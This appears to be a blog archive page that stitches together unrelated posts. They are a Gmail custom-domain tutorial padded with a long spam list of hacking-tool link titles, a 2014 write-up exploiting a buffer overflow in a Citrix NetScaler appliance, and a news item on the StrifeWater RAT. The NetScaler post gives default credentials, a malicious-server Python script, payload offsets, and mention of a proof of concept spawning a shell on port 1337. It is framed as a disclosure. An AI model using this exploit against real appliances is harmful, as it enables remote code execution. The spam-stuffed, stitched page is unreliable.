quarta-feira, 31 de maio de 2023

HACKING GMAIL FOR FREE CUSTOM DOMAIN EMAIL

hacking-gmail-for-free-custom-domain-email


HACKING GMAIL FOR FREE CUSTOM DOMAIN EMAIL

When it comes to email providers, there's no competitor to Google's awesome features. It is efficient which connects seamlessly with the rest of your Google products such as YouTube, Drive, has a major application called Gmail Inbox, and is overall an extremely powerful email service. However, to use it with a custom domain, you need to purchase Google Apps for either $5 or $10/month, which for casual users is a bit unnecessary. On top of that, you don't even get all of the features a personal account gets, e.g. Inbox. So, here's a free way to use your Gmail account with a custom domain. I am just going to show you hacking Gmail for free custom domain email.

SO, HOW HACKING GMAIL FOR FREE CUSTOM DOMAIN EMAIL

PASSWORD: EHT

STEPS:

  • First, register with Mailgun using your Gmail address. Use your Gmail only. Once you have clicked the confirm link, log in to the Mailgun website. Now you're in the dashboard, move on the right under "Custom Domains", click "Add Domain".
  • Follow the setup instructions and set DNS records with whoever manages your DNS. Once you've done this, click on the "Routes" link on the top to set up email forwarding.
  • Now move to the Route tab and click on Create New Route.
  • As you click the button, you will see a page like below. Just enter the information as entered in the following screenshot.
  • Just replace the quoted email with your desired email in the above-given screenshot.
  • Next, we'll setup SMTP configuration so we would be able to send emails from an actual server. Go to "Domains" tab, click on your domain name.
  • On this page, click "Manage your SMTP credentials" then "New SMTP Credential" on the next page.
  • Type in the desired SMTP credentials. And, go to Gmail settings and click "Add another email address you own". Once you open, enter the email address you wish to send from.
  • In the next step, set the SMTP settings as follows.
  • After clicking "Add Account" button, now you're done.
  • The final step, make sure to set it to default email in the Gmail settings > Accounts.
That's all. Now you got free Gmail custom domain with 10,000 emails per month. Hope it will work for you. If you find any issue, just comment below.

Note: Use Virtual Machine and scan on VirusTotal before downloading any program on Host Machine for your privacy.

More articles


  1. Android Hack Tools Github
  2. Pentest Tools Url Fuzzer
  3. Hak5 Tools
  4. Hacking Tools For Kali Linux
  5. Hacker Security Tools
  6. Hacks And Tools
  7. Hack Tools
  8. Hacker Tools Github
  9. Android Hack Tools Github
  10. Hacking Tools For Windows Free Download
  11. Hack Apps
  12. Black Hat Hacker Tools
  13. Pentest Tools Linux
  14. What Are Hacking Tools
  15. Underground Hacker Sites
  16. Wifi Hacker Tools For Windows
  17. Hacker Tools Apk Download
  18. Hack Tools Pc
  19. Pentest Tools Tcp Port Scanner
  20. Pentest Tools Open Source
  21. Top Pentest Tools
  22. Pentest Recon Tools
  23. Hacking Tools Pc
  24. Pentest Tools Alternative
  25. Hacker Tools Software
  26. Hackers Toolbox
  27. Pentest Tools Online
  28. Pentest Tools Android
  29. Hacker Tools 2020
  30. Best Hacking Tools 2020
  31. Pentest Tools Open Source
  32. Hacking Tools Kit
  33. Hacking Tools Free Download
  34. Pentest Box Tools Download
  35. Termux Hacking Tools 2019
  36. Hack And Tools
  37. Free Pentest Tools For Windows
  38. Hacker Tools Free Download
  39. World No 1 Hacker Software
  40. Nsa Hack Tools
  41. Hacker Tools List
  42. Hacking Tools For Games
  43. Hacking Tools Mac
  44. Computer Hacker
  45. Pentest Tools Alternative
  46. Hack Tools For Mac
  47. Pentest Tools Android
  48. Hacking Tools Name
  49. Hacker Tools Hardware
  50. Hacker Tools For Ios
  51. Pentest Tools Linux
  52. Android Hack Tools Github
  53. Bluetooth Hacking Tools Kali
  54. Pentest Reporting Tools
  55. Hacker Tools 2020
  56. Hacking Tools For Windows Free Download
  57. Underground Hacker Sites
  58. Physical Pentest Tools
  59. Hack Tools
  60. Underground Hacker Sites
  61. How To Make Hacking Tools
  62. Pentest Tools Website Vulnerability
  63. Ethical Hacker Tools
  64. Pentest Box Tools Download
  65. Hacks And Tools
  66. Hack Tools Online
  67. Pentest Tools Nmap
  68. World No 1 Hacker Software
  69. Pentest Tools Windows
  70. Pentest Tools Subdomain
  71. Beginner Hacker Tools
  72. Pentest Tools
  73. Hack And Tools
  74. Hacking Tools And Software
  75. Pentest Tools Apk
  76. How To Make Hacking Tools
  77. Pentest Tools Apk
  78. Hacking Tools For Mac
  79. Beginner Hacker Tools
  80. Hack Tools Download
  81. Hacking Tools For Kali Linux
  82. Hacker Tools Github
  83. Hacker Tools 2019
  84. Pentest Tools For Mac
  85. Wifi Hacker Tools For Windows
  86. New Hacker Tools
  87. Blackhat Hacker Tools
  88. Termux Hacking Tools 2019
  89. Hack Rom Tools
  90. Pentest Tools Port Scanner
  91. Hacker Tools 2020
  92. Pentest Tools For Ubuntu
  93. Hack App
  94. Pentest Box Tools Download
às quarta-feira, maio 31, 2023 Postado por ANINHA 0 comentários

Scaling The NetScaler


A few months ago I noticed that Citrix provides virtual appliances to test their applications, I decided to pull down an appliance and take a peek. First I started out by downloading the trial Netscaler VM (version 10.1-119.7) from the following location:

http://www.citrix.com/products/netscaler-application-delivery-controller/try.html

Upon boot, the appliance is configured with nsroot/nsroot for the login and password. I logged in and started looking around and noticed that the web application is written in PHP using the code igniter framework (screw that crap). Since code igniter abstracts everything with MVC and actual scripts are hidden behind routes I decided to take a look at the apache configuration. I noticed that apache was configured with a SOAP endpoint that was using shared objects (YUMMY):

/etc/httpd 
# SOAP handler
<Location /soap>
SetHandler gsoap-handler SOAPLibrary /usr/lib/libnscli90.so SupportLibrary /usr/lib/libnsapps.so </Location>
It wasn't clear what this end point was used for and it wasn't friendly if you hit it directly:


So I grep'd through the application code looking for any calls to this service and got a hit:
root@ns# grep -r '/soap' *
models/common/xmlapi_model.php: $this->soap_client = new nusoap_client("http://" . $this->server_ip . "/soap");

Within this file I saw this juicy bit of PHP which would have made this whole process way easier if it wasn't neutered with the hardcoded "$use_api = true;"

/netscaler/ns_gui/admin_ui/php/application/models/common/xmlapi_model.php
protected function command_execution($command, $parameters, $use_api = true) {
//Reporting can use API & exe to execute commands. To make it work, comment the following line.
$use_api = true; if(!$use_api)
{
$exec_command = "/netscaler/nscollect " . $this- >convert_parameters_to_string($command, $parameters);
$this->benchmark->mark("ns_exe_start");
$exe_result = exec($exec_command); $this->benchmark->mark("ns_exe_end");
$elapsed_time = $this->benchmark->elapsed_time("ns_exe_start",
"ns_exe_end");
log_message("profile", $elapsed_time . " --> EXE_EXECUTION_TIME " .
$command); $this->result["rc"] = 0;
$this->result["message"] = "Done"; $this->result["List"] = array(array("response" => $exe_result));
$return_value = 0;
For giggles I set it to false and gave it a whirl, worked as expected :(

The other side of this "if" statement was a reference to making a soap call and due to the reference to the local "/soap" and the fact all roads from "do_login" were driven to this file through over nine thousand levels of abstraction it was clear that upon login the server made an internal request to this endpoint. I started up tcpdump on the loopback interface on the box and captured an example request:
root@ns# tcpdump -Ani lo0 -s0 port 80
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on lo0, link-type NULL (BSD loopback), capture size 65535 bytes 23:29:18.169188 IP 127.0.0.1.49731 > 127.0.0.1.80: P 1:863(862) ack 1 win 33304 <nop,nop,timestamp 1659543 1659542>
E...>D@.@............C.P'R...2.............
..R...R.POST /soap HTTP/1.0
Host: 127.0.0.1
User-Agent: NuSOAP/0.9.5 (1.56)
Content-Type: text/xml; charset=ISO-8859-1
SOAPAction: ""
Content-Length: 708
<?xml version="1.0" encoding="ISO-8859-1"?><SOAP-ENV:Envelope SOAP- ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP- ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP- ENC="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body> <ns7744:login xmlns:ns7744="urn:NSConfig"><username xsi:type="xsd:string">nsroot</username><password xsi:type="xsd:string">nsroot</password><clientip
xsi:type="xsd:string">192.168.166.1</clientip><cookieTimeout xsi:type="xsd:int">1800</cookieTimeout><ns xsi:type="xsd:string">192.168.166.138</ns></ns7744:login></SOAP-ENV:Body> </SOAP-ENV:Envelope>
23:29:18.174582 IP 127.0.0.1.80 > 127.0.0.1.49731: P 1:961(960) ack 863 win 33304 <nop,nop,timestamp 1659548 1659543>
E...>[@.@............P.C.2..'R.o.....\.....
..R...R.HTTP/1.1 200 OK
Date: Mon, 02 Jun 2014 23:29:18 GMT
Server: Apache
Last-Modified: Mon, 02 Jun 2014 23:29:18 GMT Status: 200 OK
Content-Length: 615
Connection: keep-alive, close
Set-Cookie: NSAPI=##7BD2646BC9BC8A2426ACD0A5D92AF3377A152EBFDA878F45DAAF34A43 09F;Domain=127.0.0.1;Path=/soap;Version=1
Content-Type: text/xml; charset=utf-8
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP- ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP- ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns="urn:NSConfig"> <SOAP-ENV:Header></SOAP-ENV:Header><SOAP-ENV:Body SOAP- ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <ns:loginResponse><return xsi:type="ns:simpleResult"><rc xsi:type="xsd:unsignedInt">0</rc><message xsi:type="xsd:string">Done</message> </return></ns:loginResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>
I pulled the request out and started playing with it in burp repeater. The one thing that seemed strange was that it had a parameter that was the IP of the box itself, the client string I got...it was used for tracking who was making requests to login, but the other didn't really make sense to me. I went ahead and changed the address to another VM and noticed something strange:



According to tcpdump it was trying to connect to my provided host on port 3010:
root@ns# tcpdump -A host 192.168.166.137 and port not ssh
tcpdump: WARNING: BIOCPROMISC: Device busy
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on 0/1, link-type EN10MB (Ethernet), capture size 96 bytes 23:37:17.040559 IP 192.168.166.138.49392 > 192.168.166.137.3010: S 4126875155:4126875155(0) win 65535 <mss 1460,nop,wscale 1,nop,nop,timestamp 2138392 0,sackOK,eol>

I fired up netcat to see what it was sending, but it was just "junk", so I grabbed a pcap on the loopback interface on the netscaler vm to catch a normal transaction between the SOAP endpoint and the service to see what it was doing. It still wasn't really clear exactly what the data was as it was some sort of "binary" stream:



I grabbed a copy of the servers response and setup a test python client that replied with a replay of the servers response, it worked (and there may be an auth bypass here as it responds with a cookie for some API functionality...). I figured it may be worth shooting a bunch of crap back at the client just to see what would happen. I modified my python script to insert a bunch "A" into the stream:
import socket,sys
resp = "\x00\x01\x00\x00\xa5\xa5"+ ("A"*1000)+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
HOST = None # Symbolic name meaning all available interfaces
PORT = 3010 # Arbitrary non-privileged port
s = None
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC,socket.SOCK_STREAM, 0, socket.AI_PASSIVE):
af, socktype, proto, canonname, sa = res
try:
s = socket.socket(af, socktype, proto)
except socket.error as msg:
s = None
continue
try:
s.bind(sa)
s.listen(1)
except socket.error as msg:
s.close()
s = None
continue
break
if s is None:
print 'could not open socket'
sys.exit(1)
conn, addr = s.accept()
print 'Connected by', addr
while 1:
data = conn.recv(1024)
if not data:
break
print 'sending!' conn.send(resp)
print 'sent!' conn.close()


Which provided the following awesome log entry in the Netscaler VM window:
Loading the dump up in gdb we get the following (promising looking):


And the current instruction it is trying to call:
An offset into the address 0x41414141, sure that usually works :P - we need to adjust the payload in a way that EDX is a valid address we can address by offset in order to continue execution. In order to do that we need to figure out where in our payload the EDX value is coming from. The metasploit "pattern_create" works great for this ("root@blah:/usr/share/metasploit-framework/tools# ./pattern_create.rb 1000"). After replacing the "A" *1000 in our script with the pattern we can see that EDX is at offset 610 in our payload:





Looking at the source of EDX, which is an offset of EBP we can see the rest of our payload, we can go ahead and replace the value in our payload at offset 610 with the address of EBP 
resp = "\x00\x01\x00\x00\xa5\xa5"+p[:610]+'\x78\xda\xff\xff'+p[614:]+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

When we run everything again and take a look at our core dump you can see we have progressed in execution and have hit another snag that causes a crash:

The crash was caused because once again the app is trying to access a value at an offset of a bad address (from our payload). This value is at offset 606 in our payload according to "pattern_offset" and if you were following along you can see that this value sits at 0xffffda78 + 4, which is what we specified previously. So we need to adjust our payload with another address to have EDX point at a valid address and keep playing whack a mole OR we can look at the function and possibly find a short cut:




If we can follow this code path keeping EDX a valid memory address and set EBP+12 (offset in our payload) to 0x0 we can take the jump LEAV/RET and for the sake of time and my sanity, unroll the call stack to the point of our control. You will have to trust me here OR download the VM and see for yourself (my suggestion if you have found this interesting :> )

And of course, the money shot:


A PoC can be found HERE that will spawn a shell on port 1337 of the NetScaler vm, hopefully someone has some fun with it :)

It is not clear if this issue has been fixed by Citrix as they stopped giving me updates on the status of this bug. For those that are concerned with the timeline:

6/3/14 - Bug was reported to Citrix
6/4/14 - Confirmation report was received
6/24/14 - Update from Citrix - In the process of scheduling updates
7/14/14 - Emailed asking for update
7/16/14 - Update from Citrix - Still scheduling update, will let me know the following week.
9/22/14 - No further communication received. Well past 100 days, public disclosure


More information


às quarta-feira, maio 31, 2023 Postado por ANINHA 0 comentários

Hacker Group 'Moses Staff' Using New StrifeWater RAT In Ransomware Attacks

 


A politically motivated hacker group tied to a series of espionage and sabotage attacks on Israeli entities in 2021 incorporated a previously undocumented remote access trojan (RAT) that masquerades as the Windows Calculator app as part of a conscious effort to stay under the radar.

Cybersecurity company Cybereason, which has been tracking the operations of the Iranian actor known as Moses Staff, dubbed the malware "StrifeWater."

"The StrifeWater RAT appears to be used in the initial stage of the attack and this stealthy RAT has the ability to remove itself from the system to cover the Iranian group's tracks," Tom Fakterman, Cybereason security analyst, said in a report. "The RAT possesses other capabilities, such as command execution and screen capturing, as well as the ability to download additional extensions."

Moses Staff came to light towards the end of last year when Check Point Research unmasked a series of attacks aimed at Israeli organizations since September 2021 with the objective of disrupting the targets' business operations by encrypting their networks, with no option to regain access or negotiate a ransom.

The intrusions were notable for the fact that they relied on the open-source library DiskCryptor to perform volume encryption, in addition to infecting the systems with a bootloader that prevents them from starting without the correct encryption key.


To date, victims have been reported beyond Israel, including Italy, India, Germany, Chile, Turkey, the U.A.E., and the U.S.

The new piece of the attack puzzle discovered by Cybereason comes in the form of a RAT that's deployed under the name "calc.exe" (the Windows Calculator binary) and is used during the early stages of the infection chain, only to be removed prior to the deployment of the file-encrypting malware.

The removal and the subsequent replacement of the malicious calculator executable with the legitimate binary, the researchers suspect, is an attempt on the part of the threat actor to cover up tracks and erase evidence of the trojan, not to mention enable them to evade detection until the final phase of the attack when the ransomware payload is executed.

StrifeWater, for its part, is no different from its counterparts and comes with numerous features, chief among them being the ability to list system files, execute system commands, take screen captures, create persistence, and download updates and auxiliary modules.

"The end goal for Moses Staff appears to be more politically motivated rather than financial," Fakterman concluded. "Moses Staff employs ransomware post-exfiltration not for financial gain, but to disrupt operations, obfuscate espionage activity, and to inflict damage to systems to advance Iran's geopolitical goals."

Related news


às quarta-feira, maio 31, 2023 Postado por ANINHA 0 comentários
Assinar: Postagens (Atom)